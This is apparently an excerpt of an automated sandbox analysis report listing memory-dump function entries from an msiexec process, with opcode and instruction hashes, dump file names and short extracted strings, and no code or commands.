                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a71a7c7cec3fb9d04631c7bac1b4c4eed8bf6401fbc95b8bc9ced1937fc7ae4
                                      • Instruction ID: 668a1714c8d48e79eae7d4a923d7953bb36cf90eb98dbc06b83212f82ca0bcac
                                      • Opcode Fuzzy Hash: 4a71a7c7cec3fb9d04631c7bac1b4c4eed8bf6401fbc95b8bc9ced1937fc7ae4
                                      • Instruction Fuzzy Hash: DB117032A00314CFCB36EFB984511AEBBF1AF48310B15447DE849EB241E639CD428B91
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3ede226a106992963f43c3304a04a79952af0c5d5337a9326b02bf3d7ae37843
                                      • Instruction ID: 3b310bfcab15c9ab0146988e3b0255cffca800f3f5dda3df949161ec9f763d35
                                      • Opcode Fuzzy Hash: 3ede226a106992963f43c3304a04a79952af0c5d5337a9326b02bf3d7ae37843
                                      • Instruction Fuzzy Hash: 7E21C2B5D01659AFCB10CF9AD885ADEFFB8FF49310F10856AE918A7200C374A950CFA5
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3290916493.000000000034D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0034D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_34d000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d21551876316e45bd0f5c645c1d798fb76669fd7c0fc968ae6a832c02c9a4eed
                                      • Instruction ID: ba9a67bd70c4ad2aa13c2f7d5965b5bb636caa1c5228375d9a038fdcb0f56282
                                      • Opcode Fuzzy Hash: d21551876316e45bd0f5c645c1d798fb76669fd7c0fc968ae6a832c02c9a4eed
                                      • Instruction Fuzzy Hash: C611BB75504280CFCB12CF14D9C4B15BBA1FB84314F28C6AAD8494F656C33AE84ACB62
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3291091378.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_370000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ec5b37b612f33361f3f92290fd447f4079f750c50593899b21df80a095b4737b
                                      • Instruction ID: 8648cf6f5bc5f3e459af391ab5289fe1e2fb73f2c58e7a760365c2c816d4d2c6
                                      • Opcode Fuzzy Hash: ec5b37b612f33361f3f92290fd447f4079f750c50593899b21df80a095b4737b
                                      • Instruction Fuzzy Hash: B6016132A003148FCF36EFB9845119DBBF5EB48310B158479E909EB241E639D8428B91
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 075028d3a5c51827744c80d78b7831f37db890d4369032c5a2e7eca91b74d27b
                                      • Instruction ID: e2cb77efaac1a4e939cc6deabd78f62b2d76e1ba0278ae6b108653989bb8df0c
                                      • Opcode Fuzzy Hash: 075028d3a5c51827744c80d78b7831f37db890d4369032c5a2e7eca91b74d27b
                                      • Instruction Fuzzy Hash: C411D3B1D01259AFCB10CF9AD884ADEFFB8FF49310F10812AE918A7200C3746940CFA5
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3291091378.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_370000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04ca2ff37104ecb1db06fd46e64fbaaaabeac185fecb3fb02bfdbaaa53c5b8c0
                                      • Instruction ID: a28cb1d27994706d071499f8db9bea02f38c4f553cf62a69f4b3df4bc40f0f6c
                                      • Opcode Fuzzy Hash: 04ca2ff37104ecb1db06fd46e64fbaaaabeac185fecb3fb02bfdbaaa53c5b8c0
                                      • Instruction Fuzzy Hash: D40149387002155FCB2726B9D995A5B779BDBC2310F01883AD40DCF357CA18DC0A87A5
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5fef6701c47f62f323765ce545b01ce2b8ff2f6335ca6627c550735f35c85d7c
                                      • Instruction ID: 9d996f2db23b68a37bba34f1190ef3e757cc30aa2e55d204615cc8465f25642f
                                      • Opcode Fuzzy Hash: 5fef6701c47f62f323765ce545b01ce2b8ff2f6335ca6627c550735f35c85d7c
                                      • Instruction Fuzzy Hash: 5901AD31B001114FD714DA6DD584B1EA2CEDBCA718F20887AE50ECB396DD65DD024392
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3291091378.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_370000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7790f049e78345b6499b72403d9b6aca0aff358043c8c94b0fb9349a7b062b32
                                      • Instruction ID: 6b2b9c352566c077d3009f50857bb205d25a26fd980a6e2866a023815ff6b8cc
                                      • Opcode Fuzzy Hash: 7790f049e78345b6499b72403d9b6aca0aff358043c8c94b0fb9349a7b062b32
                                      • Instruction Fuzzy Hash: 8B0126327043005BC73AA73899D163E76D7AFCA254704447EE50ACB341DF78DC0A8392
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3291091378.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_370000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6db643886541494a5a941f54478fd2571c4bd648c03550f225c296f14c2fbd71
                                      • Instruction ID: 96034ee485bbbed65a7c3274c8550f7a83b6170f261600ba3f34ebba55987ac5
                                      • Opcode Fuzzy Hash: 6db643886541494a5a941f54478fd2571c4bd648c03550f225c296f14c2fbd71
                                      • Instruction Fuzzy Hash: 1EF024393001159FCB3766B9E59562AB29FEBC1310F118839D00ECF315DE28DC0643A5
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 105533289c672c70b77a2127566478a11c6e4a8ee0802eacdb3449de9dbea2de
                                      • Instruction ID: 0e967ae4233e85501345462875437509a5d59e8252393fc7cd1d7e3a94caafe0
                                      • Opcode Fuzzy Hash: 105533289c672c70b77a2127566478a11c6e4a8ee0802eacdb3449de9dbea2de
                                      • Instruction Fuzzy Hash: EEE0EC71A02208EBDB00CAA4C94974A76ADD70621CF2088A5D409D7206E577DA01C741
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$66'
                                      • API String ID: 0-2194784831
                                      • Opcode ID: 491dd8a1e58f1f6630828bf9a7569a01357818fbae3ac098d4bb166ecc787388
                                      • Instruction ID: 1f0cd5d842fe64aa0a89eb57be17ccec1ec32bc921333df6a1c0f4423c6c10c7
                                      • Opcode Fuzzy Hash: 491dd8a1e58f1f6630828bf9a7569a01357818fbae3ac098d4bb166ecc787388
                                      • Instruction Fuzzy Hash: FE125D30A0131ACFDB28DF69C895A9DB7F6BF88304F2089A9D409AB355DB359D45CF90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3291091378.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_370000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                      • API String ID: 0-1272861565
                                      • Opcode ID: e8740c7e1f99073dbcf3e6855547a5b1844fbb7587195f30968b030df1507ff5
                                      • Instruction ID: d37ff4baa300ff0686ba44e911ee22b07918c11c8299aeb136108e85a7186073
                                      • Opcode Fuzzy Hash: e8740c7e1f99073dbcf3e6855547a5b1844fbb7587195f30968b030df1507ff5
                                      • Instruction Fuzzy Hash: E981794285E3E21FD327966C68F92E53F719F23214F0954E7C9858B1A3F91C481EC3AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                      • API String ID: 0-1273862796
                                      • Opcode ID: 11eb7df9120c2188bf6fb0ab90f4a3cfe5115efcc355005a1714abd56513e746
                                      • Instruction ID: 837a49bcd641df4d8d0785dfacc768a75831f617845d7cf34a9802e86d6da030
                                      • Opcode Fuzzy Hash: 11eb7df9120c2188bf6fb0ab90f4a3cfe5115efcc355005a1714abd56513e746
                                      • Instruction Fuzzy Hash: 90918B30A01309DFDB18DFA4C994BAE77FAEF84309F108429E441AB391DB789D41CB94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                      • API String ID: 0-981061697
                                      • Opcode ID: 74843559a5dae7f4aad7b13932c877314024b31bfe96b3c0818fd42561af9e5f
                                      • Instruction ID: 60bc5889771a2ce77841a5fce3a0f0c49683e32c1d65e8535aaa5c0b2d3c25a7
                                      • Opcode Fuzzy Hash: 74843559a5dae7f4aad7b13932c877314024b31bfe96b3c0818fd42561af9e5f
                                      • Instruction Fuzzy Hash: ECF14A30A11309CFDB19DFA8C5A5A5EBBB6FF84304F248568D405AB366DF399C42CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fbq$XPbq$\Obq$x=6'$x=6'
                                      • API String ID: 0-459809451
                                      • Opcode ID: e050848227933e2c3c21c18bb6491df3f82203d562ba59d9184a2cf187e31a25
                                      • Instruction ID: d334474cee1d6e740d659cc264888db713a555ba988db88069676f7eda85bad5
                                      • Opcode Fuzzy Hash: e050848227933e2c3c21c18bb6491df3f82203d562ba59d9184a2cf187e31a25
                                      • Instruction Fuzzy Hash: 35616D31F002189FDB159FA8C854B9EBAF6EF88304F208429E50AEB395DA758D418B91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $]q$$]q$$]q$$]q
                                      • API String ID: 0-858218434
                                      • Opcode ID: d85302a28e6bb1c93c97efc77c9befff59e10db8c100bbd82b08cfbe30877509
                                      • Instruction ID: 45bebd6a9766e47c04d19af03a48af9ebb665a6fde6971974d3214a2f6445561
                                      • Opcode Fuzzy Hash: d85302a28e6bb1c93c97efc77c9befff59e10db8c100bbd82b08cfbe30877509
                                      • Instruction Fuzzy Hash: 68B12D30A01209CFDB1ADFA8C595A9EB7B6FF84305F248869D405AB395DB35DD82CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $]q$$]q$$]q$$]q
                                      • API String ID: 0-858218434
                                      • Opcode ID: b1347d3f77bf3983b8eb7041fc004d2967c89359f2e679a13fda612c4a5ecbc4
                                      • Instruction ID: 7c6381692ef1884435e9cbfeff967242652de4443c03eba7a0e74c747975f2b5
                                      • Opcode Fuzzy Hash: b1347d3f77bf3983b8eb7041fc004d2967c89359f2e679a13fda612c4a5ecbc4
                                      • Instruction Fuzzy Hash: 7B915030B1030A8FDB54DF69C990B9EB3F6FF84214F108565C809EB385EE749D468B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $]q$$]q$$]q$$]q
                                      • API String ID: 0-858218434
                                      • Opcode ID: 7958aa1dcc1052a8891d0455641268c850729e10adea1afad48f8b71a4258720
                                      • Instruction ID: a995dc85ce7a4f4ae89bf13a0ef094b9f84540df1b95971ac41128f2311bf312
                                      • Opcode Fuzzy Hash: 7958aa1dcc1052a8891d0455641268c850729e10adea1afad48f8b71a4258720
                                      • Instruction Fuzzy Hash: 2F51C130A01305CFCB19DF68C585A9EB3BAEF84319F20856AE405EB356DB38DD41CB89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LR]q$LR]q$$]q$$]q
                                      • API String ID: 0-3527005858
                                      • Opcode ID: 828178dc0b489a4eb701360d48e615d9389d43cd8900c1de2819a526fa4bc86a
                                      • Instruction ID: 2fa92272aaa88ebd696768ceedfce902c418bcf1377c501b7ce3c9aff1d31408
                                      • Opcode Fuzzy Hash: 828178dc0b489a4eb701360d48e615d9389d43cd8900c1de2819a526fa4bc86a
                                      • Instruction Fuzzy Hash: 44519E307113019FDB1ADF68C986E5AB7AAFF84308F1485A9E4069B3A5DA74EC41CBD1